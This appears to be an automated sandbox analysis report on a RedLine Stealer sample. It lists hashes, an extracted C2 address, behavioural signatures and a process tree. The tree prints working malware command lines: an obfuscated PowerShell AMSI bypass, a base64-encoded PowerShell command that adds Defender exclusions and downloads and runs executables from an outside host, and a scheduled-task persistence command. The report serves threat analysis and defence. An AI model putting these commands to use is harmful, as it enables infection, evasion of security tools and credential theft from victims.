Analysis

  • max time kernel
    151s
  • max time network
    102s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-01-2023 06:59

General

  • Target

    b3e4aa7167322e62d0ab56f0ba11c3adfef87eb1.exe

  • Size

    119KB

  • MD5

    d9a2313ebd1f9d41687e127028bc230e

  • SHA1

    b3e4aa7167322e62d0ab56f0ba11c3adfef87eb1

  • SHA256

    a5d8eac92699a2e8870775b0eb150bb3fdedf4e86f6b0a26a122ad5f7e9fd3c2

  • SHA512

    4ee00a77199e82d63967f9731a5dd101f2dcec52584337dff306c2d5b71dfa4d83ac473617da0b022d301f8878b5cd835b18a35603fbe9dd7682064dc30264be

  • SSDEEP

    3072:EcJw0ADKnZ1bEGSzLu1XlEWb3MeUn3PAngc13Aa99sXcc:/W3IZ1bgQlExeUcN99sXcc

Malware Config

Extracted

Family

redline

Botnet

1

C2

107.182.129.73:21733

Attributes
  • auth_value

    3a5bb0917495b4312d052a0b8977d2bb

Signatures

  • Modifies security service 2 TTPs 5 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 1 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 7 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 5 IoCs
  • Stops running service(s) 3 TTPs
  • Uses the VBS compiler for execution 1 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Drops file in System32 directory 6 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Launches sc.exe 5 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Program crash 7 IoCs
  • Checks processor information in registry 2 TTPs 9 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\lsass.exe
    C:\Windows\system32\lsass.exe
    1⤵
      PID:672
    • C:\Windows\system32\winlogon.exe
      winlogon.exe
      1⤵
        PID:620
        • C:\Windows\system32\dwm.exe
          "dwm.exe"
          2⤵
            PID:1016
          • C:\Windows\System32\dllhost.exe
            C:\Windows\System32\dllhost.exe /Processid:{d6f25d8d-dbbe-4cdc-9040-7e94bdf51220}
            2⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:1300
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
          1⤵
            PID:432
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
            1⤵
            • Drops file in System32 directory
            PID:1152
            • C:\Windows\system32\taskhostw.exe
              taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
              2⤵
                PID:2512
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
                C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:WKsFPyEDYYnu{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$TOJMWHdtZELIIx,[Parameter(Position=1)][Type]$ejWUxgCghx)$azgFoicXJoQ=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+'l'+'e'+''+[Char](99)+''+[Char](116)+''+[Char](101)+'d'+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+''+'g'+'a'+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+[Char](101)+'mo'+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+'d'+''+'u'+''+'l'+''+'e'+'',$False).DefineType(''+[Char](77)+'y'+'D'+''+[Char](101)+'l'+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+''+'e'+''+'T'+''+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+'C'+''+[Char](108)+'as'+[Char](115)+''+','+'P'+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+'S'+'ea'+[Char](108)+'ed'+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+[Char](67)+''+'l'+'a'+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+''+[Char](111)+'C'+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$azgFoicXJoQ.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+'e'+'c'+''+[Char](105)+'a'+'l'+''+[Char](78)+'am'+[Char](101)+','+'H'+''+'i'+''+'d'+''+[Char](101)+'By'+[Char](83)+''+[Char](105)+''+[Char](103)+',P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$TOJMWHdtZELIIx).SetImplementationFlags('R'+'u'+''+'n'+''+'t'+'i'+[Char](109)+'e,'+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$azgFoicXJoQ.DefineMethod(''+[Char](73)+'n'+'v'+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+'id'+'e'+''+'B'+''+[Char](121)+''+[Char](83)+'ig,'+[Char](78)+'e'+[Char](119)+''+[Char](83)+''+'l'+''+'o'+''+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+'t'+[Char](117)+''+[Char](97)+'l',$ejWUxgCghx,$TOJMWHdtZELIIx).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+'t'+[Char](105)+''+'m'+''+'e'+','+'M'+'a'+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $azgFoicXJoQ.CreateType();}$eXqfPZwUEEqIj=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+'s'+''+[Char](116)+'e'+'m'+''+[Char](46)+'dl'+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+'c'+[Char](114)+''+'o'+''+[Char](115)+''+[Char](111)+'f'+[Char](116)+''+'.'+'Wi'+[Char](110)+''+[Char](51)+'2'+'.'+'U'+[Char](110)+'s'+[Char](97)+'fe'+'e'+'X'+'q'+''+[Char](102)+''+'P'+''+'Z'+''+[Char](119)+''+'U'+''+'E'+'E'+[Char](113)+''+[Char](73)+'j');$ydJsFATArWVOcj=$eXqfPZwUEEqIj.GetMethod('ydJsF'+[Char](65)+''+[Char](84)+''+[Char](65)+''+'r'+''+[Char](87)+''+[Char](86)+''+[Char](79)+''+[Char](99)+'j',[Reflection.BindingFlags]''+[Char](80)+''+[Char](117)+''+[Char](98)+'li'+'c'+','+'S'+''+[Char](116)+''+[Char](97)+''+'t'+'i'+'c'+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$CwNGvGscOzWAXHdxswT=WKsFPyEDYYnu @([String])([IntPtr]);$OkKfSeEcNYxHXuTSZcVzgl=WKsFPyEDYYnu @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$obunaYoNgos=$eXqfPZwUEEqIj.GetMethod(''+'G'+''+'e'+''+'t'+''+[Char](77)+''+'o'+'dul'+[Char](101)+''+'H'+''+[Char](97)+''+'n'+'d'+[Char](108)+'e').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+'n'+[Char](101)+'l3'+[Char](50)+''+[Char](46)+''+[Char](100)+''+'l'+'l')));$uGEoWKDfgUgkQU=$ydJsFATArWVOcj.Invoke($Null,@([Object]$obunaYoNgos,[Object]('L'+[Char](111)+'ad'+'L'+''+[Char](105)+''+'b'+''+[Char](114)+'a'+'r'+''+[Char](121)+'A')));$HFhElbOjQYQdrtsGn=$ydJsFATArWVOcj.Invoke($Null,@([Object]$obunaYoNgos,[Object](''+'V'+'i'+'r'+''+'t'+''+[Char](117)+'alP'+'r'+''+[Char](111)+'te'+'c'+''+[Char](116)+'')));$haQvInq=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($uGEoWKDfgUgkQU,$CwNGvGscOzWAXHdxswT).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$UFFgvWdXcPXwgNCJq=$ydJsFATArWVOcj.Invoke($Null,@([Object]$haQvInq,[Object](''+'A'+'m'+[Char](115)+''+[Char](105)+''+'S'+''+[Char](99)+'anB'+[Char](117)+''+[Char](102)+''+'f'+''+[Char](101)+'r')));$ZpnqrQOpln=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($HFhElbOjQYQdrtsGn,$OkKfSeEcNYxHXuTSZcVzgl).Invoke($UFFgvWdXcPXwgNCJq,[uint32]8,4,[ref]$ZpnqrQOpln);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$UFFgvWdXcPXwgNCJq,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($HFhElbOjQYQdrtsGn,$OkKfSeEcNYxHXuTSZcVzgl).Invoke($UFFgvWdXcPXwgNCJq,[uint32]8,0x20,[ref]$ZpnqrQOpln);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+'T'+[Char](87)+''+[Char](65)+''+[Char](82)+'E').GetValue('di'+'a'+'l'+'e'+''+[Char](114)+''+[Char](115)+''+'t'+''+[Char](97)+'g'+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)
                2⤵
                • Drops file in System32 directory
                • Modifies data under HKEY_USERS
                • Suspicious behavior: EnumeratesProcesses
                PID:2548
                • C:\Windows\System32\Conhost.exe
                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  3⤵
                    PID:3104
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:hDWeLSUJibrM{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$LjNzmTPxWJwsJR,[Parameter(Position=1)][Type]$wlBxxWUPSF)$kwJYQFYRKJm=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+[Char](108)+''+[Char](101)+'ct'+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+'te')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+[Char](77)+'em'+[Char](111)+''+'r'+''+[Char](121)+'M'+[Char](111)+'dule',$False).DefineType('My'+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+'t'+[Char](101)+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+[Char](44)+'P'+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+','+''+[Char](83)+''+'e'+''+[Char](97)+'le'+[Char](100)+''+[Char](44)+''+[Char](65)+'n'+'s'+''+[Char](105)+''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+'A'+''+[Char](117)+''+'t'+'o'+'C'+''+'l'+''+[Char](97)+'s'+'s'+'',[MulticastDelegate]);$kwJYQFYRKJm.DefineConstructor(''+'R'+'T'+'S'+''+[Char](112)+''+[Char](101)+''+'c'+'i'+[Char](97)+''+[Char](108)+''+[Char](78)+''+[Char](97)+'m'+[Char](101)+''+[Char](44)+''+'H'+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+''+'y'+'S'+[Char](105)+''+[Char](103)+''+','+'P'+[Char](117)+'b'+'l'+'ic',[Reflection.CallingConventions]::Standard,$LjNzmTPxWJwsJR).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+''+[Char](109)+'e'+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$kwJYQFYRKJm.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+'e'+'',''+'P'+'ub'+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+''+[Char](101)+''+[Char](66)+'yS'+[Char](105)+''+'g'+''+[Char](44)+''+'N'+''+[Char](101)+''+[Char](119)+''+[Char](83)+'lo'+[Char](116)+''+','+'V'+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+'',$wlBxxWUPSF,$LjNzmTPxWJwsJR).SetImplementationFlags(''+[Char](82)+'u'+'n'+''+[Char](116)+'i'+'m'+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+'a'+'g'+''+[Char](101)+'d');Write-Output $kwJYQFYRKJm.CreateType();}$tjYPiGMPcPIps=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+'t'+[Char](101)+''+'m'+'.'+[Char](100)+''+[Char](108)+'l')}).GetType('Mi'+'c'+''+[Char](114)+''+[Char](111)+''+[Char](115)+''+'o'+''+[Char](102)+'t'+[Char](46)+''+'W'+''+[Char](105)+''+[Char](110)+'3'+[Char](50)+''+'.'+''+'U'+''+'n'+''+[Char](115)+''+'a'+'f'+'e'+''+[Char](116)+''+'j'+''+'Y'+''+[Char](80)+'i'+'G'+'MP'+'c'+''+'P'+'I'+[Char](112)+''+'s'+'');$JQYDCiEBfvctzh=$tjYPiGMPcPIps.GetMethod(''+[Char](74)+'QY'+[Char](68)+''+[Char](67)+''+'i'+''+[Char](69)+'B'+'f'+''+[Char](118)+''+[Char](99)+''+[Char](116)+'z'+'h'+'',[Reflection.BindingFlags]''+[Char](80)+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+'c,'+[Char](83)+'t'+[Char](97)+'t'+[Char](105)+''+'c'+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$HGwDpsaJsZMPgtIYjDJ=hDWeLSUJibrM @([String])([IntPtr]);$yVrHFpyWDuEfQONHhlDEhz=hDWeLSUJibrM @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ukhMprUwoIJ=$tjYPiGMPcPIps.GetMethod('G'+[Char](101)+''+[Char](116)+''+'M'+''+[Char](111)+''+'d'+''+'u'+'l'+[Char](101)+''+'H'+''+[Char](97)+''+[Char](110)+''+'d'+''+[Char](108)+'e').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+[Char](101)+'l'+[Char](51)+''+'2'+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$PfndtYGxLRxxiN=$JQYDCiEBfvctzh.Invoke($Null,@([Object]$ukhMprUwoIJ,[Object](''+[Char](76)+''+[Char](111)+'a'+[Char](100)+'L'+'i'+''+'b'+'r'+'a'+'r'+[Char](121)+''+[Char](65)+'')));$YKuLyHLsjujMMkFsC=$JQYDCiEBfvctzh.Invoke($Null,@([Object]$ukhMprUwoIJ,[Object](''+[Char](86)+''+[Char](105)+'r'+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+'t'+'e'+[Char](99)+''+[Char](116)+'')));$bFCDkuf=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PfndtYGxLRxxiN,$HGwDpsaJsZMPgtIYjDJ).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+[Char](105)+'.'+'d'+'l'+'l'+'');$XldYuoEFGSwzzOLyT=$JQYDCiEBfvctzh.Invoke($Null,@([Object]$bFCDkuf,[Object](''+[Char](65)+''+'m'+''+[Char](115)+''+[Char](105)+''+'S'+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+'f'+''+[Char](102)+''+[Char](101)+'r')));$jBRBXGqAdO=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($YKuLyHLsjujMMkFsC,$yVrHFpyWDuEfQONHhlDEhz).Invoke($XldYuoEFGSwzzOLyT,[uint32]8,4,[ref]$jBRBXGqAdO);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$XldYuoEFGSwzzOLyT,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($YKuLyHLsjujMMkFsC,$yVrHFpyWDuEfQONHhlDEhz).Invoke($XldYuoEFGSwzzOLyT,[uint32]8,0x20,[ref]$jBRBXGqAdO);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+'FT'+[Char](87)+''+[Char](65)+''+'R'+'E').GetValue('d'+'i'+''+[Char](97)+''+[Char](108)+'e'+[Char](114)+''+[Char](115)+''+[Char](116)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)
                  2⤵
                  • Modifies data under HKEY_USERS
                  PID:2620
                  • C:\Windows\System32\Conhost.exe
                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    3⤵
                      PID:4052
                  • C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
                    C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
                    2⤵
                    • Executes dropped EXE
                    PID:212
                    • C:\Windows\SysWOW64\schtasks.exe
                      /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
                      3⤵
                      • Creates scheduled task(s)
                      PID:2632
                      • C:\Windows\System32\Conhost.exe
                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        4⤵
                          PID:1072
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                    1⤵
                      PID:1196
                    • C:\Windows\System32\svchost.exe
                      C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                      1⤵
                        PID:1460
                      • C:\Windows\System32\svchost.exe
                        C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                        1⤵
                          PID:1780
                        • C:\Windows\system32\sihost.exe
                          sihost.exe
                          1⤵
                            PID:2388
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                            1⤵
                              PID:2396
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                              1⤵
                                PID:2452
                              • C:\Windows\System32\svchost.exe
                                C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                1⤵
                                  PID:2216
                                • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                  "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                  1⤵
                                  • Drops file in System32 directory
                                  • Modifies data under HKEY_USERS
                                  PID:2588
                                • C:\Windows\System32\svchost.exe
                                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                  1⤵
                                    PID:2696
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                    1⤵
                                      PID:2704
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                      1⤵
                                        PID:2652
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                        1⤵
                                          PID:2720
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                          1⤵
                                            PID:2580
                                          • C:\Windows\Explorer.EXE
                                            C:\Windows\Explorer.EXE
                                            1⤵
                                            • Suspicious behavior: GetForegroundWindowSpam
                                            PID:2644
                                            • C:\Users\Admin\AppData\Local\Temp\b3e4aa7167322e62d0ab56f0ba11c3adfef87eb1.exe
                                              "C:\Users\Admin\AppData\Local\Temp\b3e4aa7167322e62d0ab56f0ba11c3adfef87eb1.exe"
                                              2⤵
                                              • Suspicious use of SetThreadContext
                                              • Suspicious use of WriteProcessMemory
                                              PID:2472
                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                                                3⤵
                                                • Suspicious use of WriteProcessMemory
                                                PID:4888
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdABhACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYwBqAHIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBjAHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYgB4AHoAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcALAAgADwAIwBhAGEAYQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGMAZAB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGwAcwBqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQApADwAIwB3AGQAcwAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBuAGUAdwAyAC4AZQB4AGUAJwAsACAAPAAjAGoAYgBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcQB6AGEAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAYwBlAGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQApADwAIwBtAGIAegAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBqAHcAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGYAcQB0ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAYgBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAHUAYQB3ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcALAAgADwAIwBoAGkAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHQAcAB2ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHQAcgBzACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQApADwAIwBqAGwAcAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBkAGMAcgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZAB3AHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwApADwAIwBoAHgAZwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBwAGcAeQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAbQBkAGYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQA8ACMAdgBoAGUAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZQBxAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGoAbABkACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApADwAIwB5AGkAbQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAGEAZQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcABrAGoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBtAGEAcgB0AEQAZQBmAFIAdQBuAC4AZQB4AGUAJwApADwAIwBoAGYAZAAjAD4A"
                                                  4⤵
                                                  • Blocklisted process makes network request
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:3180
                                                  • C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
                                                    5⤵
                                                    • Executes dropped EXE
                                                    PID:1716
                                                  • C:\Users\Admin\AppData\Local\Temp\new2.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\new2.exe"
                                                    5⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of SetThreadContext
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:2356
                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                                                      6⤵
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:1116
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2356 -s 492
                                                      6⤵
                                                      • Program crash
                                                      PID:2056
                                                  • C:\Users\Admin\AppData\Local\Temp\SysApp.exe
